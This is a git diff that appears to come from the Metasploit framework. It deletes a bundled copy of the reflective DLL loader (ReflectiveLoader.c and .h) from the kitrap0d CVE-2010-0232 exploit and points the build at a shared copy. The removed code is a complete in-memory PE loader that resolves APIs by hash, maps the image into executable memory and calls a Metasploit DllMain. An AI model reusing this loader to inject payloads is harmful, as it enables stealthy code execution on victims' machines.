- if( uiHeaderValue >= sizeof(IMAGE_DOS_HEADER) && uiHeaderValue < 1024 ) - { - uiHeaderValue += uiLibraryAddress; - // break if we have found a valid MZ/PE header - if( ((PIMAGE_NT_HEADERS)uiHeaderValue)->Signature == IMAGE_NT_SIGNATURE ) - break; - } - } - uiLibraryAddress--; - } - - // STEP 1: process the kernels exports for the functions our loader needs... - - // get the Process Enviroment Block -#ifdef _WIN64 - uiBaseAddress = __readgsqword( 0x60 ); -#else -#ifdef WIN_ARM - uiBaseAddress = *(DWORD *)( (BYTE *)_MoveFromCoprocessor( 15, 0, 13, 0, 2 ) + 0x30 ); -#else _WIN32 - uiBaseAddress = __readfsdword( 0x30 ); -#endif -#endif - - // get the processes loaded modules. ref: http://msdn.microsoft.com/en-us/library/aa813708(VS.85).aspx - uiBaseAddress = (ULONG_PTR)((_PPEB)uiBaseAddress)->pLdr; - - // get the first entry of the InMemoryOrder module list - uiValueA = (ULONG_PTR)((PPEB_LDR_DATA)uiBaseAddress)->InMemoryOrderModuleList.Flink; - while( uiValueA ) - { - // get pointer to current modules name (unicode string) - uiValueB = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.pBuffer; - // set bCounter to the length for the loop - usCounter = ((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.Length; - // clear uiValueC which will store the hash of the module name - uiValueC = 0; - - // compute the hash of the module name... 
- do - { - uiValueC = ror( (DWORD)uiValueC ); - // normalize to uppercase if the module name is in lowercase - if( *((BYTE *)uiValueB) >= 'a' ) - uiValueC += *((BYTE *)uiValueB) - 0x20; - else - uiValueC += *((BYTE *)uiValueB); - uiValueB++; - } while( --usCounter ); - - // compare the hash with that of kernel32.dll - if( (DWORD)uiValueC == KERNEL32DLL_HASH ) - { - // get this modules base address - uiBaseAddress = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->DllBase; - - // get the VA of the modules NT Header - uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew; - - // uiNameArray = the address of the modules export directory entry - uiNameArray = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ]; - - // get the VA of the export directory - uiExportDir = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress ); - - // get the VA for the array of name pointers - uiNameArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames ); - - // get the VA for the array of name ordinals - uiNameOrdinals = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals ); - - usCounter = 3; -#ifdef ENABLE_STOPPAGING - usCounter++; -#endif -#ifdef ENABLE_OUTPUTDEBUGSTRING - usCounter++; -#endif - - // loop while we still have imports to find - while( usCounter > 0 ) - { - // compute the hash values for this function name - dwHashValue = _hash( (char *)( uiBaseAddress + DEREF_32( uiNameArray ) ) ); - - // if we have found a function we want we get its virtual address - if( dwHashValue == LOADLIBRARYA_HASH - || dwHashValue == GETPROCADDRESS_HASH - || dwHashValue == VIRTUALALLOC_HASH -#ifdef ENABLE_STOPPAGING - || dwHashValue == VIRTUALLOCK_HASH -#endif -#ifdef ENABLE_OUTPUTDEBUGSTRING - || dwHashValue == OUTPUTDEBUG_HASH -#endif - ) - { - // get the VA for the array of addresses - uiAddressArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY 
)uiExportDir)->AddressOfFunctions ); - - // use this functions name ordinal as an index into the array of name pointers - uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) ); - - // store this functions VA - if( dwHashValue == LOADLIBRARYA_HASH ) - pLoadLibraryA = (LOADLIBRARYA)( uiBaseAddress + DEREF_32( uiAddressArray ) ); - else if( dwHashValue == GETPROCADDRESS_HASH ) - pGetProcAddress = (GETPROCADDRESS)( uiBaseAddress + DEREF_32( uiAddressArray ) ); - else if( dwHashValue == VIRTUALALLOC_HASH ) - pVirtualAlloc = (VIRTUALALLOC)( uiBaseAddress + DEREF_32( uiAddressArray ) ); -#ifdef ENABLE_STOPPAGING - else if( dwHashValue == VIRTUALLOCK_HASH ) - pVirtualLock = (VIRTUALLOCK)( uiBaseAddress + DEREF_32( uiAddressArray ) ); -#endif -#ifdef ENABLE_OUTPUTDEBUGSTRING - else if( dwHashValue == OUTPUTDEBUG_HASH ) - pOutputDebug = (OUTPUTDEBUG)( uiBaseAddress + DEREF_32( uiAddressArray ) ); -#endif - - // decrement our counter - usCounter--; - } - - // get the next exported function name - uiNameArray += sizeof(DWORD); - - // get the next exported function name ordinal - uiNameOrdinals += sizeof(WORD); - } - } - else if( (DWORD)uiValueC == NTDLLDLL_HASH ) - { - // get this modules base address - uiBaseAddress = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->DllBase; - - // get the VA of the modules NT Header - uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew; - - // uiNameArray = the address of the modules export directory entry - uiNameArray = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ]; - - // get the VA of the export directory - uiExportDir = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress ); - - // get the VA for the array of name pointers - uiNameArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames ); - - // get the VA for the array of name ordinals - uiNameOrdinals = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY 
)uiExportDir)->AddressOfNameOrdinals ); - - usCounter = 1; - - // loop while we still have imports to find - while( usCounter > 0 ) - { - // compute the hash values for this function name - dwHashValue = _hash( (char *)( uiBaseAddress + DEREF_32( uiNameArray ) ) ); - - // if we have found a function we want we get its virtual address - if( dwHashValue == NTFLUSHINSTRUCTIONCACHE_HASH ) - { - // get the VA for the array of addresses - uiAddressArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions ); - - // use this functions name ordinal as an index into the array of name pointers - uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) ); - - // store this functions VA - if( dwHashValue == NTFLUSHINSTRUCTIONCACHE_HASH ) - pNtFlushInstructionCache = (NTFLUSHINSTRUCTIONCACHE)( uiBaseAddress + DEREF_32( uiAddressArray ) ); - - // decrement our counter - usCounter--; - } - - // get the next exported function name - uiNameArray += sizeof(DWORD); - - // get the next exported function name ordinal - uiNameOrdinals += sizeof(WORD); - } - } - - // we stop searching when we have found everything we need. - if( pLoadLibraryA - && pGetProcAddress - && pVirtualAlloc -#ifdef ENABLE_STOPPAGING - && pVirtualLock -#endif - && pNtFlushInstructionCache -#ifdef ENABLE_OUTPUTDEBUGSTRING - && pOutputDebug -#endif - ) - break; - - // get the next entry - uiValueA = DEREF( uiValueA ); - } - - // STEP 2: load our image into a new permanent location in memory... - - // get the VA of the NT Header for the PE to be loaded - uiHeaderValue = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew; - - // allocate all the memory for the DLL to be loaded into. we can load at any address because we will - // relocate the image. Also zeros all memory and marks it as READ, WRITE and EXECUTE to avoid any problems. 
- uiBaseAddress = (ULONG_PTR)pVirtualAlloc( NULL, ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfImage, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE ); - -#ifdef ENABLE_STOPPAGING - // prevent our image from being swapped to the pagefile - pVirtualLock((LPVOID)uiBaseAddress, ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfImage); -#endif - - // we must now copy over the headers - uiValueA = ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfHeaders; - uiValueB = uiLibraryAddress; - uiValueC = uiBaseAddress; - - while( uiValueA-- ) - *(BYTE *)uiValueC++ = *(BYTE *)uiValueB++; - - // STEP 3: load in all of our sections... - - // uiValueA = the VA of the first section - uiValueA = ( (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader + ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.SizeOfOptionalHeader ); - - // itterate through all sections, loading them into memory. - uiValueE = ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.NumberOfSections; - while( uiValueE-- ) - { - // uiValueB is the VA for this section - uiValueB = ( uiBaseAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->VirtualAddress ); - - // uiValueC if the VA for this sections data - uiValueC = ( uiLibraryAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->PointerToRawData ); - - // copy the section over - uiValueD = ((PIMAGE_SECTION_HEADER)uiValueA)->SizeOfRawData; - - while( uiValueD-- ) - *(BYTE *)uiValueB++ = *(BYTE *)uiValueC++; - - // get the VA of the next section - uiValueA += sizeof( IMAGE_SECTION_HEADER ); - } - - // STEP 4: process our images import table... 
- - // uiValueB = the address of the import directory - uiValueB = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_IMPORT ]; - - // we assume there is an import table to process - // uiValueC is the first entry in the import table - uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress ); - - // iterate through all imports until a null RVA is found (Characteristics is mis-named) - while( ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Characteristics ) - { - OUTPUTDBG("Loading library: "); - OUTPUTDBG((LPCSTR)(uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name)); - OUTPUTDBG("\n"); - - // use LoadLibraryA to load the imported module into memory - uiLibraryAddress = (ULONG_PTR)pLoadLibraryA( (LPCSTR)( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name ) ); - - if ( !uiLibraryAddress ) - { - OUTPUTDBG("Loading library FAILED\n"); - - uiValueC += sizeof( IMAGE_IMPORT_DESCRIPTOR ); - continue; - } - - // uiValueD = VA of the OriginalFirstThunk - uiValueD = ( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->OriginalFirstThunk ); - - // uiValueA = VA of the IAT (via first thunk not origionalfirstthunk) - uiValueA = ( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->FirstThunk ); - - // itterate through all imported functions, importing by ordinal if no name present - while( DEREF(uiValueA) ) - { - // sanity check uiValueD as some compilers only import by FirstThunk - if( uiValueD && ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal & IMAGE_ORDINAL_FLAG ) - { - // get the VA of the modules NT Header - uiExportDir = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew; - - // uiNameArray = the address of the modules export directory entry - uiNameArray = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ]; - - // get the VA of the export directory - uiExportDir = ( uiLibraryAddress + 
((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress ); - - // get the VA for the array of addresses - uiAddressArray = ( uiLibraryAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions ); - - // use the import ordinal (- export ordinal base) as an index into the array of addresses - uiAddressArray += ( ( IMAGE_ORDINAL( ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal ) - ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->Base ) * sizeof(DWORD) ); - - // patch in the address for this imported function - DEREF(uiValueA) = ( uiLibraryAddress + DEREF_32(uiAddressArray) ); - } - else - { - // get the VA of this functions import by name struct - uiValueB = ( uiBaseAddress + DEREF(uiValueA) ); - - OUTPUTDBG("Resolving function: "); - OUTPUTDBG(((PIMAGE_IMPORT_BY_NAME)uiValueB)->Name); - OUTPUTDBG("\n"); - - // use GetProcAddress and patch in the address for this imported function - DEREF(uiValueA) = (ULONG_PTR)pGetProcAddress( (HMODULE)uiLibraryAddress, (LPCSTR)((PIMAGE_IMPORT_BY_NAME)uiValueB)->Name ); - } - // get the next imported function - uiValueA += sizeof( ULONG_PTR ); - if( uiValueD ) - uiValueD += sizeof( ULONG_PTR ); - } - - // get the next import - uiValueC += sizeof( IMAGE_IMPORT_DESCRIPTOR ); - } - - // STEP 5: process all of our images relocations... - - // calculate the base address delta and perform relocations (even if we load at desired image base) - uiLibraryAddress = uiBaseAddress - ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.ImageBase; - - // uiValueB = the address of the relocation directory - uiValueB = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_BASERELOC ]; - - // check if their are any relocations present - if( ((PIMAGE_DATA_DIRECTORY)uiValueB)->Size ) - { - // uiValueC is now the first entry (IMAGE_BASE_RELOCATION) - uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress ); - - // and we itterate through all entries... 
- while( ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock ) - { - // uiValueA = the VA for this relocation block - uiValueA = ( uiBaseAddress + ((PIMAGE_BASE_RELOCATION)uiValueC)->VirtualAddress ); - - // uiValueB = number of entries in this relocation block - uiValueB = ( ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION) ) / sizeof( IMAGE_RELOC ); - - // uiValueD is now the first entry in the current relocation block - uiValueD = uiValueC + sizeof(IMAGE_BASE_RELOCATION); - - // we itterate through all the entries in the current block... - while( uiValueB-- ) - { - // perform the relocation, skipping IMAGE_REL_BASED_ABSOLUTE as required. - // we dont use a switch statement to avoid the compiler building a jump table - // which would not be very position independent! - if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_DIR64 ) - *(ULONG_PTR *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += uiLibraryAddress; - else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGHLOW ) - *(DWORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += (DWORD)uiLibraryAddress; -#ifdef WIN_ARM - // Note: On ARM, the compiler optimization /O2 seems to introduce an off by one issue, possibly a code gen bug. Using /O1 instead avoids this problem. - else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_ARM_MOV32T ) - { - register DWORD dwInstruction; - register DWORD dwAddress; - register WORD wImm; - // get the MOV.T instructions DWORD value (We add 4 to the offset to go past the first MOV.W which handles the low word) - dwInstruction = *(DWORD *)( uiValueA + ((PIMAGE_RELOC)uiValueD)->offset + sizeof(DWORD) ); - // flip the words to get the instruction as expected - dwInstruction = MAKELONG( HIWORD(dwInstruction), LOWORD(dwInstruction) ); - // sanity chack we are processing a MOV instruction... 
- if( (dwInstruction & ARM_MOV_MASK) == ARM_MOVT ) - { - // pull out the encoded 16bit value (the high portion of the address-to-relocate) - wImm = (WORD)( dwInstruction & 0x000000FF); - wImm |= (WORD)((dwInstruction & 0x00007000) >> 4); - wImm |= (WORD)((dwInstruction & 0x04000000) >> 15); - wImm |= (WORD)((dwInstruction & 0x000F0000) >> 4); - // apply the relocation to the target address - dwAddress = ( (WORD)HIWORD(uiLibraryAddress) + wImm ) & 0xFFFF; - // now create a new instruction with the same opcode and register param. - dwInstruction = (DWORD)( dwInstruction & ARM_MOV_MASK2 ); - // patch in the relocated address... - dwInstruction |= (DWORD)(dwAddress & 0x00FF); - dwInstruction |= (DWORD)(dwAddress & 0x0700) << 4; - dwInstruction |= (DWORD)(dwAddress & 0x0800) << 15; - dwInstruction |= (DWORD)(dwAddress & 0xF000) << 4; - // now flip the instructions words and patch back into the code... - *(DWORD *)( uiValueA + ((PIMAGE_RELOC)uiValueD)->offset + sizeof(DWORD) ) = MAKELONG( HIWORD(dwInstruction), LOWORD(dwInstruction) ); - } - } -#endif - else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGH ) - *(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += HIWORD(uiLibraryAddress); - else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_LOW ) - *(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += LOWORD(uiLibraryAddress); - - // get the next entry in the current relocation block - uiValueD += sizeof( IMAGE_RELOC ); - } - - // get the next entry in the relocation directory - uiValueC = uiValueC + ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock; - } - } - - // STEP 6: call our images entry point - - // uiValueA = the VA of our newly loaded DLL/EXE's entry point - uiValueA = ( uiBaseAddress + ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.AddressOfEntryPoint ); - - OUTPUTDBG("Flushing the instruction cache"); - // We must flush the instruction cache to avoid stale code being used which was updated by our relocation processing. 
- pNtFlushInstructionCache( (HANDLE)-1, NULL, 0 ); - - // call our respective entry point, fudging our hInstance value -#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR - // if we are injecting a DLL via LoadRemoteLibraryR we call DllMain and pass in our parameter (via the DllMain lpReserved parameter) - ((DLLMAIN)uiValueA)( (HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, lpParameter ); -#else - // if we are injecting an DLL via a stub we call DllMain with no parameter - ((DLLMAIN)uiValueA)( (HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, NULL ); -#endif - - // STEP 8: return our new entry point address so whatever called us can call DllMain() if needed. - return uiValueA; -} -//===============================================================================================// -#ifndef REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN - -// you must implement this function... -extern DWORD DLLEXPORT Init( SOCKET socket ); - -BOOL MetasploitDllAttach( SOCKET socket ) -{ - Init( socket ); - return TRUE; -} - -BOOL MetasploitDllDetach( DWORD dwExitFunc ) -{ - switch( dwExitFunc ) - { - case EXITFUNC_SEH: - SetUnhandledExceptionFilter( NULL ); - break; - case EXITFUNC_THREAD: - ExitThread( 0 ); - break; - case EXITFUNC_PROCESS: - ExitProcess( 0 ); - break; - default: - break; - } - - return TRUE; -} - -BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved ) -{ - BOOL bReturnValue = TRUE; - - switch( dwReason ) - { - case DLL_METASPLOIT_ATTACH: - bReturnValue = MetasploitDllAttach( (SOCKET)lpReserved ); - break; - case DLL_METASPLOIT_DETACH: - bReturnValue = MetasploitDllDetach( (DWORD)lpReserved ); - break; - case DLL_QUERY_HMODULE: - if( lpReserved != NULL ) - *(HMODULE *)lpReserved = hAppInstance; - break; - case DLL_PROCESS_ATTACH: - hAppInstance = hinstDLL; - break; - case DLL_PROCESS_DETACH: - case DLL_THREAD_ATTACH: - case DLL_THREAD_DETACH: - break; - } - return bReturnValue; -} - -#endif 
-//===============================================================================================// diff --git a/external/source/exploits/CVE-2010-0232/common/ReflectiveLoader.h b/external/source/exploits/CVE-2010-0232/common/ReflectiveLoader.h deleted file mode 100644 index 26c195b2fc..0000000000 --- a/external/source/exploits/CVE-2010-0232/common/ReflectiveLoader.h +++ /dev/null 
@@ -1,223 +0,0 @@
-//===============================================================================================//
-// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
-// All rights reserved.
-//
-// Redistribution and use in source and binary forms, with or without modification, are permitted
-// provided that the following conditions are met:
-//
-// * Redistributions of source code must retain the above copyright notice, this list of
-// conditions and the following disclaimer.
-//
-// * Redistributions in binary form must reproduce the above copyright notice, this list of
-// conditions and the following disclaimer in the documentation and/or other materials provided
-// with the distribution.
-//
-// * Neither the name of Harmony Security nor the names of its contributors may be used to
-// endorse or promote products derived from this software without specific prior written permission.
-//
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
-// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
-// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
-// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
-// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
-// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
-// POSSIBILITY OF SUCH DAMAGE.
-//===============================================================================================//
-#ifndef _METERPRETER_SOURCE_REFLECTIVEDLLINJECTION_REFLECTIVELOADER_H
-#define _METERPRETER_SOURCE_REFLECTIVEDLLINJECTION_REFLECTIVELOADER_H
-//===============================================================================================//
-#define WIN32_LEAN_AND_MEAN
-#include
-#include
-#include
-
-#include "ReflectiveDLLInjection.h"
-
-// Enable this define to turn on OutputDebugString support
-//#define ENABLE_OUTPUTDEBUGSTRING 1
-
-// Enable this define to turn on locking of memory to prevent paging
-#define ENABLE_STOPPAGING 1
-
-#define EXITFUNC_SEH 0xEA320EFE
-#define EXITFUNC_THREAD 0x0A2A1DE0
-#define EXITFUNC_PROCESS 0x56A2B5F0
-
-typedef HMODULE (WINAPI * LOADLIBRARYA)( LPCSTR );
-typedef FARPROC (WINAPI * GETPROCADDRESS)( HMODULE, LPCSTR );
-typedef LPVOID (WINAPI * VIRTUALALLOC)( LPVOID, SIZE_T, DWORD, DWORD );
-typedef DWORD (NTAPI * NTFLUSHINSTRUCTIONCACHE)( HANDLE, PVOID, ULONG );
-
-#define KERNEL32DLL_HASH 0x6A4ABC5B
-#define NTDLLDLL_HASH 0x3CFA685D
-
-#define LOADLIBRARYA_HASH 0xEC0E4E8E
-#define GETPROCADDRESS_HASH 0x7C0DFCAA
-#define VIRTUALALLOC_HASH 0x91AFCA54
-#define NTFLUSHINSTRUCTIONCACHE_HASH 0x534C0AB8
-
-#ifdef ENABLE_STOPPAGING
-typedef LPVOID (WINAPI * VIRTUALLOCK)( LPVOID, SIZE_T );
-#define VIRTUALLOCK_HASH 0x0EF632F2
-#endif
-
-#ifdef ENABLE_OUTPUTDEBUGSTRING
-typedef LPVOID (WINAPI * OUTPUTDEBUG)( LPCSTR );
-#define OUTPUTDEBUG_HASH 0x470D22BC
-#endif
-
-#define IMAGE_REL_BASED_ARM_MOV32A 5
-#define IMAGE_REL_BASED_ARM_MOV32T 7
-
-#define ARM_MOV_MASK (DWORD)(0xFBF08000)
-#define ARM_MOV_MASK2 (DWORD)(0xFBF08F00)
-#define ARM_MOVW 0xF2400000
-#define ARM_MOVT 0xF2C00000
-
-#define HASH_KEY 13
-//===============================================================================================//
-#pragma intrinsic( _rotr )
-
-__forceinline DWORD ror( DWORD d )
-{
- return _rotr( d, HASH_KEY );
-}
-
-__forceinline DWORD _hash( char * c )
-{
- register DWORD h = 0;
- do
- {
- h = ror( h );
- h += *c;
- } while( *++c );
-
- return h;
-}
-//===============================================================================================//
-typedef struct _UNICODE_STR
-{
- USHORT Length;
- USHORT MaximumLength;
- PWSTR pBuffer;
-} UNICODE_STR, *PUNICODE_STR;
-
-// WinDbg> dt -v ntdll!_LDR_DATA_TABLE_ENTRY
-//__declspec( align(8) )
-typedef struct _LDR_DATA_TABLE_ENTRY
-{
- //LIST_ENTRY InLoadOrderLinks; // As we search from PPEB_LDR_DATA->InMemoryOrderModuleList we dont use the first entry.
- LIST_ENTRY InMemoryOrderModuleList;
- LIST_ENTRY InInitializationOrderModuleList;
- PVOID DllBase;
- PVOID EntryPoint;
- ULONG SizeOfImage;
- UNICODE_STR FullDllName;
- UNICODE_STR BaseDllName;
- ULONG Flags;
- SHORT LoadCount;
- SHORT TlsIndex;
- LIST_ENTRY HashTableEntry;
- ULONG TimeDateStamp;
-} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;
-
-// WinDbg> dt -v ntdll!_PEB_LDR_DATA
-typedef struct _PEB_LDR_DATA //, 7 elements, 0x28 bytes
-{
- DWORD dwLength;
- DWORD dwInitialized;
- LPVOID lpSsHandle;
- LIST_ENTRY InLoadOrderModuleList;
- LIST_ENTRY InMemoryOrderModuleList;
- LIST_ENTRY InInitializationOrderModuleList;
- LPVOID lpEntryInProgress;
-} PEB_LDR_DATA, * PPEB_LDR_DATA;
-
-// WinDbg> dt -v ntdll!_PEB_FREE_BLOCK
-typedef struct _PEB_FREE_BLOCK // 2 elements, 0x8 bytes
-{
- struct _PEB_FREE_BLOCK * pNext;
- DWORD dwSize;
-} PEB_FREE_BLOCK, * PPEB_FREE_BLOCK;
-
-// struct _PEB is defined in Winternl.h but it is incomplete
-// WinDbg> dt -v ntdll!_PEB
-typedef struct __PEB // 65 elements, 0x210 bytes
-{
- BYTE bInheritedAddressSpace;
- BYTE bReadImageFileExecOptions;
- BYTE bBeingDebugged;
- BYTE bSpareBool;
- LPVOID lpMutant;
- LPVOID lpImageBaseAddress;
- PPEB_LDR_DATA pLdr;
- LPVOID lpProcessParameters;
- LPVOID lpSubSystemData;
- LPVOID lpProcessHeap;
- PRTL_CRITICAL_SECTION pFastPebLock;
- LPVOID lpFastPebLockRoutine;
- LPVOID lpFastPebUnlockRoutine;
- DWORD dwEnvironmentUpdateCount;
- LPVOID lpKernelCallbackTable;
- DWORD dwSystemReserved;
- DWORD dwAtlThunkSListPtr32;
- PPEB_FREE_BLOCK pFreeList;
- DWORD dwTlsExpansionCounter;
- LPVOID lpTlsBitmap;
- DWORD dwTlsBitmapBits[2];
- LPVOID lpReadOnlySharedMemoryBase;
- LPVOID lpReadOnlySharedMemoryHeap;
- LPVOID lpReadOnlyStaticServerData;
- LPVOID lpAnsiCodePageData;
- LPVOID lpOemCodePageData;
- LPVOID lpUnicodeCaseTableData;
- DWORD dwNumberOfProcessors;
- DWORD dwNtGlobalFlag;
- LARGE_INTEGER liCriticalSectionTimeout;
- DWORD dwHeapSegmentReserve;
- DWORD dwHeapSegmentCommit;
- DWORD dwHeapDeCommitTotalFreeThreshold;
- DWORD dwHeapDeCommitFreeBlockThreshold;
- DWORD dwNumberOfHeaps;
- DWORD dwMaximumNumberOfHeaps;
- LPVOID lpProcessHeaps;
- LPVOID lpGdiSharedHandleTable;
- LPVOID lpProcessStarterHelper;
- DWORD dwGdiDCAttributeList;
- LPVOID lpLoaderLock;
- DWORD dwOSMajorVersion;
- DWORD dwOSMinorVersion;
- WORD wOSBuildNumber;
- WORD wOSCSDVersion;
- DWORD dwOSPlatformId;
- DWORD dwImageSubsystem;
- DWORD dwImageSubsystemMajorVersion;
- DWORD dwImageSubsystemMinorVersion;
- DWORD dwImageProcessAffinityMask;
- DWORD dwGdiHandleBuffer[34];
- LPVOID lpPostProcessInitRoutine;
- LPVOID lpTlsExpansionBitmap;
- DWORD dwTlsExpansionBitmapBits[32];
- DWORD dwSessionId;
- ULARGE_INTEGER liAppCompatFlags;
- ULARGE_INTEGER liAppCompatFlagsUser;
- LPVOID lppShimData;
- LPVOID lpAppCompatInfo;
- UNICODE_STR usCSDVersion;
- LPVOID lpActivationContextData;
- LPVOID lpProcessAssemblyStorageMap;
- LPVOID lpSystemDefaultActivationContextData;
- LPVOID lpSystemAssemblyStorageMap;
- DWORD dwMinimumStackCommit;
-} _PEB, * _PPEB;
-
-typedef struct
-{
- WORD offset:12;
- WORD type:4;
-} IMAGE_RELOC, *PIMAGE_RELOC;
-//===============================================================================================//
-#endif
-//===============================================================================================//
diff --git a/external/source/exploits/CVE-2010-0232/kitrap0d/kitrap0d.c b/external/source/exploits/CVE-2010-0232/kitrap0d/kitrap0d.c index 0e1600ee74..de50313c19 100755 --- a/external/source/exploits/CVE-2010-0232/kitrap0d/kitrap0d.c +++ b/external/source/exploits/CVE-2010-0232/kitrap0d/kitrap0d.c @@ -10,11 +10,11 @@ */ #define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR #define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN -#include "../common/ReflectiveLoader.c" +#include "../../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" #include #include "../common/common.h" -#include "../common/LoadLibraryR.h" +#include "../../../ReflectiveDLLInjection/inject/src/LoadLibraryR.h" #include "../common/ResourceLoader.h" #include "resource.h" diff --git a/external/source/exploits/CVE-2010-0232/kitrap0d/kitrap0d.vcxproj b/external/source/exploits/CVE-2010-0232/kitrap0d/kitrap0d.vcxproj index 8b82cd553c..8bc56a0824 100644 --- a/external/source/exploits/CVE-2010-0232/kitrap0d/kitrap0d.vcxproj +++ b/external/source/exploits/CVE-2010-0232/kitrap0d/kitrap0d.vcxproj @@ -49,7 +49,7 @@ Disabled - %(AdditionalIncludeDirectories) + ..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories) WIN32;_DEBUG;_WINDOWS;_USRDLL;KITRAP0D_EXPORTS;%(PreprocessorDefinitions) true EnableFastChecks @@ -81,7 +81,7 @@ MinSpace OnlyExplicitInline false - %(AdditionalIncludeDirectories) + ..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories) 